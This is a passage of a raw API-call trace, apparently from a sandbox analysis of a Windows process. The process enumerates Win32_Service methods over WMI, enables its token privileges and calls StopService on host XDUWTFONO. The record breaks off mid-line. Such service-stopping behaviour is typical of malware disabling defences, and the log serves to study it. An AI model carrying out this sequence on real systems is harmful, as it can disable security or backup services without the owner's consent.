0x30cbe0 [0254.131] malloc (_Size=0x18) returned 0x30cc00 [0254.131] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c81390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff8b2950 | out: ppNamespace=0xff8b2950*=0x1c93a98) returned 0x0 [0254.156] free (_Block=0x30cc00) [0254.156] CoSetProxyBlanket (pProxy=0x1c93a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0254.156] free (_Block=0x30cf60) [0254.156] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0254.156] free (_Block=0x30cbe0) [0254.156] malloc (_Size=0x18) returned 0x30cbe0 [0254.156] IWbemServices:GetObject (in: This=0x1c93a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xad718*=0x0, ppCallResult=0x0 | out: ppObject=0xad718*=0x1cbbfa0, ppCallResult=0x0) returned 0x0 [0254.191] free (_Block=0x30cbe0) [0254.191] IWbemClassObject:BeginMethodEnumeration (This=0x1cbbfa0, lEnumFlags=0) returned 0x0 [0254.191] IWbemClassObject:NextMethod (in: This=0x1cbbfa0, lFlags=0, pstrName=0xad6f8*=0x0, ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x0 | out: pstrName=0xad6f8*="StartService", ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x1cbc4a0) returned 0x0 [0254.192] lstrlenW (lpString="StartService") returned 12 [0254.192] lstrlenW (lpString="stopservice") returned 11 [0254.192] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0254.192] IUnknown:Release (This=0x1cbc4a0) returned 0x0 [0254.192] IWbemClassObject:NextMethod (in: This=0x1cbbfa0, lFlags=0, pstrName=0xad6f8*=0x0, ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x0 | out: pstrName=0xad6f8*="StopService", ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x1cbc4a0) returned 0x0 [0254.192] lstrlenW (lpString="StopService") returned 11 [0254.192] lstrlenW (lpString="stopservice") returned 11 [0254.192] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0254.192] malloc (_Size=0x70) returned 0x30cf60 [0254.192] ??0CHString@@QEAA@XZ () returned 0xad0c8 [0254.192] GetCurrentThreadId () returned 0xabc [0254.192] IWbemClassObject:GetNames (in: This=0x1cbc4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0xad0c0 | out: pNames=0xad0c0*="\x01ƀ\x08") returned 0x0 [0254.192] SafeArrayGetLBound (in: psa=0x244af0, nDim=0x1, plLbound=0xad0d8 | out: plLbound=0xad0d8) returned 0x0 [0254.192] SafeArrayGetUBound (in: psa=0x244af0, nDim=0x1, plUbound=0xad0d4 | out: plUbound=0xad0d4) returned 0x0 [0254.192] SafeArrayGetElement (in: psa=0x244af0, rgIndices=0xad0b4, pv=0xad0b8 | out: pv=0xad0b8) returned 0x0 [0254.193] malloc (_Size=0x48) returned 0x30cfe0 [0254.193] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1cbc4a0, wszProperty="ReturnValue", ppQualSet=0xacf08 | out: ppQualSet=0xacf08*=0x1c813b0) returned 0x0 [0254.193] malloc (_Size=0x18) returned 0x30cbe0 [0254.193] IWbemQualifierSet:Get (in: This=0x1c813b0, wszName="CIMTYPE", lFlags=0, pVal=0xacf90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0xacf90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0254.193] free (_Block=0x30cbe0) [0254.193] malloc (_Size=0x18) returned 0x30cbe0 [0254.193] IWbemClassObject:Get (in: This=0x1cbc4a0, wszName="ReturnValue", lFlags=0, pVal=0xad038*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0xacf18*=708448, plFlavor=0x0 | out: pVal=0xad038*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0xacf18*=19, plFlavor=0x0) returned 0x0 [0254.193] malloc (_Size=0x18) returned 0x30cc00 [0254.193] IWbemQualifierSet:Get (in: This=0x1c813b0, wszName="read", lFlags=0, pVal=0xacf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff8b2ac0), plFlavor=0x0 | out: pVal=0xacf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff8b2ac0), plFlavor=0x0) returned 0x80041002 [0254.194] free (_Block=0x30cc00) [0254.194] malloc (_Size=0x18) returned 0x30cc00 [0254.194] IWbemQualifierSet:Get (in: This=0x1c813b0, wszName="write", lFlags=0, pVal=0xacf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff8b2ac0), plFlavor=0x0 | out: pVal=0xacf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff8b2ac0), plFlavor=0x0) returned 0x80041002 [0254.194] free (_Block=0x30cc00) [0254.194] malloc (_Size=0x18) returned 0x30cc00 [0254.194] malloc (_Size=0x18) returned 0x30cc20 [0254.194] IWbemQualifierSet:Get (in: This=0x1c813b0, wszName="Description", lFlags=0, pVal=0xacfd0*(varType=0x0, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1=0xff854293, varVal2=0xacfd8), plFlavor=0x0 | out: pVal=0xacfd0*(varType=0x0, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1=0xff854293, varVal2=0xacfd8), plFlavor=0x0) returned 0x80041002 [0254.194] free (_Block=0x30cc20) [0254.194] malloc (_Size=0x18) returned 0x30cc20 [0254.194] lstrlenA (lpString="Not Available") returned 13 [0254.194] malloc (_Size=0x1c) returned 0x30d030 [0254.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff8422f0, cbMultiByte=-1, lpWideCharStr=0x30d030, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0254.194] free (_Block=0x30d030) [0254.194] IUnknown:Release (This=0x1c813b0) returned 0x0 [0254.195] malloc (_Size=0x48) returned 0x30d030 [0254.195] malloc (_Size=0x18) returned 0x30cc40 [0254.195] malloc (_Size=0x48) returned 0x30d080 [0254.195] malloc (_Size=0x70) returned 0x30d0d0 [0254.195] malloc (_Size=0x48) returned 0x30d150 [0254.195] free (_Block=0x30d080) [0254.195] free (_Block=0x30d030) [0254.195] free (_Block=0x30cfe0) [0254.195] free (_Block=0x30cc00) [0254.195] free (_Block=0x30cc20) [0254.195] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0254.195] IWbemClassObject:GetMethodQualifierSet (in: This=0x1cbbfa0, wszMethod="StopService", ppQualSet=0xad638 | out: ppQualSet=0xad638*=0x1c813b0) returned 0x0 [0254.195] malloc (_Size=0x18) returned 0x30cc20 [0254.196] IWbemQualifierSet:Get (in: This=0x1c813b0, wszName="Implemented", lFlags=0, pVal=0xad648*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d4119ddbfbf, varVal2=0xff8544fb), plFlavor=0x0 | out: pVal=0xad648*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d4119ddbfbf, varVal2=0xff8544fb), plFlavor=0x0) returned 0x80041002 [0254.196] free (_Block=0x30cc20) [0254.196] malloc (_Size=0x18) returned 0x30cc20 [0254.196] malloc (_Size=0x18) returned 0x30cc00 [0254.196] IWbemQualifierSet:Get (in: This=0x1c813b0, wszName="Description", lFlags=0, pVal=0xad660*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff8b2948, varVal2=0xabc), plFlavor=0x0 | out: pVal=0xad660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0xabc), plFlavor=0x0) returned 0x0 [0254.196] free (_Block=0x30cc00) [0254.196] malloc (_Size=0x18) returned 0x30cc00 [0254.196] IUnknown:Release (This=0x1c813b0) returned 0x0 [0254.196] malloc (_Size=0x70) returned 0x30cfe0 [0254.196] malloc (_Size=0x70) returned 0x30d1a0 [0254.196] malloc (_Size=0x48) returned 0x30d060 [0254.196] malloc (_Size=0x18) returned 0x30cc60 [0254.196] malloc (_Size=0x70) returned 0x30d220 [0254.196] malloc (_Size=0x70) returned 0x30d2a0 [0254.196] malloc (_Size=0x48) returned 0x30d320 [0254.196] malloc (_Size=0x50) returned 0x30d370 [0254.196] malloc (_Size=0x70) returned 0x30d3d0 [0254.196] malloc (_Size=0x70) returned 0x30d450 [0254.196] malloc (_Size=0x48) returned 0x30d4d0 [0254.196] free (_Block=0x30d320) [0254.197] free (_Block=0x30d2a0) [0254.197] free (_Block=0x30d220) [0254.197] free (_Block=0x30d060) [0254.197] free (_Block=0x30d1a0) [0254.197] free (_Block=0x30cfe0) [0254.197] IUnknown:Release (This=0x1cbc4a0) returned 0x0 [0254.197] free (_Block=0x30d150) [0254.197] free (_Block=0x30d0d0) [0254.197] free (_Block=0x30cf60) [0254.197] IWbemClassObject:NextMethod (in: This=0x1cbbfa0, lFlags=0, pstrName=0xad6f8*=0x0, ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x0 | out: pstrName=0xad6f8*="PauseService", ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x1cbc4a0) returned 0x0 [0254.197] lstrlenW (lpString="PauseService") returned 12 [0254.197] lstrlenW (lpString="stopservice") returned 11 [0254.197] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0254.197] IUnknown:Release (This=0x1cbc4a0) returned 0x0 [0254.197] IWbemClassObject:NextMethod (in: This=0x1cbbfa0, lFlags=0, pstrName=0xad6f8*=0x0, ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x0 | out: pstrName=0xad6f8*="ResumeService", ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x1cbc4a0) returned 0x0 [0254.197] lstrlenW (lpString="ResumeService") returned 13 [0254.197] lstrlenW (lpString="stopservice") returned 11 [0254.197] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0254.197] IUnknown:Release (This=0x1cbc4a0) returned 0x0 [0254.197] IWbemClassObject:NextMethod (in: This=0x1cbbfa0, lFlags=0, pstrName=0xad6f8*=0x0, ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x0 | out: pstrName=0xad6f8*="InterrogateService", ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x1cbc4a0) returned 0x0 [0254.197] lstrlenW (lpString="InterrogateService") returned 18 [0254.197] lstrlenW (lpString="stopservice") returned 11 [0254.197] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0254.198] IUnknown:Release (This=0x1cbc4a0) returned 0x0 [0254.198] IWbemClassObject:NextMethod (in: This=0x1cbbfa0, lFlags=0, pstrName=0xad6f8*=0x0, ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x0 | out: pstrName=0xad6f8*="UserControlService", ppInSignature=0xad700*=0x1cbc520, ppOutSignature=0xad708*=0x1cbca20) returned 0x0 [0254.198] lstrlenW (lpString="UserControlService") returned 18 [0254.198] lstrlenW (lpString="stopservice") returned 11 [0254.198] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0254.198] IUnknown:Release (This=0x1cbc520) returned 0x0 [0254.198] IUnknown:Release (This=0x1cbca20) returned 0x0 [0254.198] IWbemClassObject:NextMethod (in: This=0x1cbbfa0, lFlags=0, pstrName=0xad6f8*=0x0, ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x0 | out: pstrName=0xad6f8*="Create", ppInSignature=0xad700*=0x1cbe470, ppOutSignature=0xad708*=0x1cbe970) returned 0x0 [0254.198] lstrlenW (lpString="Create") returned 6 [0254.198] lstrlenW (lpString="stopservice") returned 11 [0254.198] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0254.199] IUnknown:Release (This=0x1cbe470) returned 0x0 [0254.199] IUnknown:Release (This=0x1cbe970) returned 0x0 [0254.199] IWbemClassObject:NextMethod (in: This=0x1cbbfa0, lFlags=0, pstrName=0xad6f8*=0x0, ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x0 | out: pstrName=0xad6f8*="Change", ppInSignature=0xad700*=0x1cbe1f0, ppOutSignature=0xad708*=0x1cbe6f0) returned 0x0 [0254.199] lstrlenW (lpString="Change") returned 6 [0254.199] lstrlenW (lpString="stopservice") returned 11 [0254.199] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0254.199] IUnknown:Release (This=0x1cbe1f0) returned 0x0 [0254.199] IUnknown:Release (This=0x1cbe6f0) returned 0x0 [0254.199] IWbemClassObject:NextMethod (in: This=0x1cbbfa0, lFlags=0, pstrName=0xad6f8*=0x0, ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x0 | out: pstrName=0xad6f8*="ChangeStartMode", ppInSignature=0xad700*=0x1cbc610, ppOutSignature=0xad708*=0x1cbcb10) returned 0x0 [0254.199] lstrlenW (lpString="ChangeStartMode") returned 15 [0254.199] lstrlenW (lpString="stopservice") returned 11 [0254.199] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0254.199] IUnknown:Release (This=0x1cbc610) returned 0x0 [0254.199] IUnknown:Release (This=0x1cbcb10) returned 0x0 [0254.199] IWbemClassObject:NextMethod (in: This=0x1cbbfa0, lFlags=0, pstrName=0xad6f8*=0x0, ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x0 | out: pstrName=0xad6f8*="Delete", ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x1cbc4a0) returned 0x0 [0254.199] lstrlenW (lpString="Delete") returned 6 [0254.199] lstrlenW (lpString="stopservice") returned 11 [0254.199] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0254.199] IUnknown:Release (This=0x1cbc4a0) returned 0x0 [0254.200] IWbemClassObject:NextMethod (in: This=0x1cbbfa0, lFlags=0, pstrName=0xad6f8*=0x0, ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x0 | out: pstrName=0xad6f8*="GetSecurityDescriptor", ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x1cbc640) returned 0x0 [0254.200] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0254.200] lstrlenW (lpString="stopservice") returned 11 [0254.200] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0254.200] IUnknown:Release (This=0x1cbc640) returned 0x0 [0254.200] IWbemClassObject:NextMethod (in: This=0x1cbbfa0, lFlags=0, pstrName=0xad6f8*=0x0, ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x0 | out: pstrName=0xad6f8*="SetSecurityDescriptor", ppInSignature=0xad700*=0x1cbc520, ppOutSignature=0xad708*=0x1cbca20) returned 0x0 [0254.200] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0254.200] lstrlenW (lpString="stopservice") returned 11 [0254.200] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0254.200] IUnknown:Release (This=0x1cbc520) returned 0x0 [0254.200] IUnknown:Release (This=0x1cbca20) returned 0x0 [0254.200] IWbemClassObject:NextMethod (in: This=0x1cbbfa0, lFlags=0, pstrName=0xad6f8*=0x0, ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x0 | out: pstrName=0xad6f8*=0x0, ppInSignature=0xad700*=0x0, ppOutSignature=0xad708*=0x0) returned 0x40005 [0254.200] IUnknown:Release (This=0x1cbbfa0) returned 0x0 [0254.200] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0254.200] lstrlenW (lpString="SET") returned 3 [0254.200] lstrlenW (lpString="call") returned 4 [0254.200] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0254.200] lstrlenW (lpString="CREATE") returned 6 [0254.200] lstrlenW (lpString="call") returned 4 [0254.200] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0254.200] free (_Block=0x308640) [0254.200] malloc (_Size=0x8) returned 0x30cf60 [0254.200] lstrlenW (lpString="GET") returned 3 [0254.201] lstrlenW (lpString="call") returned 4 [0254.201] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0254.201] lstrlenW (lpString="LIST") returned 4 [0254.201] lstrlenW (lpString="call") returned 4 [0254.201] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0254.201] lstrlenW (lpString="ASSOC") returned 5 [0254.201] lstrlenW (lpString="call") returned 4 [0254.201] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0254.201] WbemLocator:IUnknown:AddRef (This=0x1c81390) returned 0x3 [0254.201] free (_Block=0x306a50) [0254.201] lstrlenW (lpString="") returned 0 [0254.201] lstrlenW (lpString="XDUWTFONO") returned 9 [0254.201] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0254.201] lstrlenW (lpString="XDUWTFONO") returned 9 [0254.201] malloc (_Size=0x14) returned 0x30cc80 [0254.201] lstrlenW (lpString="XDUWTFONO") returned 9 [0254.201] GetCurrentThreadId () returned 0xabc [0254.201] GetCurrentProcess () returned 0xffffffffffffffff [0254.201] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xafa40 | out: TokenHandle=0xafa40*=0x29c) returned 1 [0254.201] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xafa38 | out: TokenInformation=0x0, ReturnLength=0xafa38) returned 0 [0254.201] malloc (_Size=0x118) returned 0x30cf80 [0254.201] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x30cf80, TokenInformationLength=0x118, ReturnLength=0xafa38 | out: TokenInformation=0x30cf80, ReturnLength=0xafa38) returned 1 [0254.201] AdjustTokenPrivileges (in: TokenHandle=0x29c, DisableAllPrivileges=0, NewState=0x30cf80*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=394083093, Attributes=0xa457), (Luid.LowPart=0x0, Luid.HighPart=3172944, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=3146072, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x1000a44a), (Luid.LowPart=0x0, Luid.HighPart=3198816, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0254.201] free (_Block=0x30cf80) [0254.201] CloseHandle (hObject=0x29c) returned 1 [0254.202] lstrlenW (lpString="GET") returned 3 [0254.202] lstrlenW (lpString="call") returned 4 [0254.202] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0254.202] lstrlenW (lpString="LIST") returned 4 [0254.202] lstrlenW (lpString="call") returned 4 [0254.202] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0254.202] lstrlenW (lpString="SET") returned 3 [0254.202] lstrlenW (lpString="call") returned 4 [0254.202] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0254.202] lstrlenW (lpString="CALL") returned 4 [0254.202] lstrlenW (lpString="call") returned 4 [0254.202] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0254.202] ??0CHString@@QEAA@XZ () returned 0xaf9f0 [0254.202] GetCurrentThreadId () returned 0xabc [0254.202] malloc (_Size=0x18) returned 0x30cca0 [0254.202] malloc (_Size=0x18) returned 0x30ccc0 [0254.202] malloc (_Size=0x18) returned 0x30cce0 [0254.202] malloc (_Size=0x18) returned 0x30cd00 [0254.202] malloc (_Size=0x18) returned 0x30d550 [0254.203] SysStringLen (param_1="\\\\") returned 0x2 [0254.203] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0254.203] malloc (_Size=0x18) returned 0x30d570 [0254.203] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0254.203] SysStringLen (param_1="\\") returned 0x1 [0254.203] malloc (_Size=0x18) returned 0x30d590 [0254.203] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0254.203] SysStringLen (param_1="root\\cimv2") returned 0xa [0254.203] free (_Block=0x30d570) [0254.203] free (_Block=0x30d550) [0254.203] free (_Block=0x30cd00) [0254.203] free (_Block=0x30cce0) [0254.203] free (_Block=0x30ccc0) [0254.203] free (_Block=0x30cca0) [0254.203] malloc (_Size=0x18) returned 0x30cca0 [0254.203] malloc (_Size=0x18) returned 0x30ccc0 [0254.203] malloc (_Size=0x18) returned 0x30cce0 [0254.204] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c81390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff8b29d0 | out: ppNamespace=0xff8b29d0*=0x1c93b28) returned 0x0 [0254.210] free (_Block=0x30cce0) [0254.210] free (_Block=0x30ccc0) [0254.210] free (_Block=0x30cca0) [0254.210] CoSetProxyBlanket (pProxy=0x1c93b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0254.210] free (_Block=0x30d590) [0254.210] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0254.210] ??0CHString@@QEAA@XZ () returned 0xaf798 [0254.210] GetCurrentThreadId () returned 0xabc [0254.210] malloc (_Size=0x70) returned 0x30cf80 [0254.210] malloc (_Size=0x50) returned 0x30d000 [0254.210] malloc (_Size=0x50) returned 0x30d060 [0254.210] malloc (_Size=0x70) returned 0x30d0c0 [0254.210] malloc (_Size=0x70) returned 0x30d140 [0254.210] malloc (_Size=0x48) returned 0x30d1c0 [0254.210] malloc (_Size=0x18) returned 0x30cca0 [0254.210] lstrlenA (lpString="") returned 0 [0254.211] malloc (_Size=0x2) returned 0x306a50 [0254.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff84314c, cbMultiByte=-1, lpWideCharStr=0x306a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0254.211] free (_Block=0x306a50) [0254.211] malloc (_Size=0x70) returned 0x30d210 [0254.211] malloc (_Size=0x48) returned 0x30d290 [0254.211] malloc (_Size=0x18) returned 0x30ccc0 [0254.211] free (_Block=0x30cca0) [0254.211] IWbemServices:GetObject (in: This=0x1c93b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xaf7c8*=0x0, ppCallResult=0x0 | out: ppObject=0xaf7c8*=0x1cbc030, ppCallResult=0x0) returned 0x0 [0254.227] malloc (_Size=0x18) returned 0x30cca0 [0254.227] IWbemClassObject:GetMethod (in: This=0x1cbc030, wszName="stopservice", lFlags=0, ppInSignature=0xaf7c0, ppOutSignature=0xaf7d8 | out: ppInSignature=0xaf7c0*=0x0, ppOutSignature=0xaf7d8*=0x1cbc530) returned 0x0 [0254.227] free (_Block=0x30cca0) [0254.227] IUnknown:Release (This=0x1cbc530) returned 0x0 [0254.227] IUnknown:Release (This=0x1cbc030) returned 0x0 [0254.227] ??0CHString@@QEAA@XZ () returned 0xaf5e0 [0254.227] GetCurrentThreadId () returned 0xabc [0254.227] malloc (_Size=0x18) returned 0x30cca0 [0254.227] lstrlenA (lpString="") returned 0 [0254.227] malloc (_Size=0x2) returned 0x306a50 [0254.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff84314c, cbMultiByte=-1, lpWideCharStr=0x306a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0254.228] free (_Block=0x306a50) [0254.228] malloc (_Size=0x18) returned 0x30cce0 [0254.228] lstrlenA (lpString="") returned 0 [0254.228] malloc (_Size=0x2) returned 0x306a50 [0254.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff84314c, cbMultiByte=-1, lpWideCharStr=0x306a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0254.228] free (_Block=0x306a50) [0254.228] malloc (_Size=0x18) returned 0x30cd00 [0254.228] free (_Block=0x30cce0) [0254.228] malloc (_Size=0x18) returned 0x30cce0 [0254.228] lstrlenA (lpString="SELECT * FROM ") returned 14 [0254.228] malloc (_Size=0x1e) returned 0x30d2e0 [0254.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff844a40, cbMultiByte=-1, lpWideCharStr=0x30d2e0, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0254.228] free (_Block=0x30d2e0) [0254.228] malloc (_Size=0x18) returned 0x30d550 [0254.228] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0254.228] SysStringLen (param_1="Win32_Service") returned 0xd [0254.228] free (_Block=0x30cce0) [0254.228] malloc (_Size=0x18) returned 0x30cce0 [0254.228] malloc (_Size=0x18) returned 0x30d570 [0254.228] lstrlenA (lpString=" WHERE ") returned 7 [0254.229] malloc (_Size=0x10) returned 0x30d590 [0254.229] MultiByteToWideChar (in: CodePage=0x0, 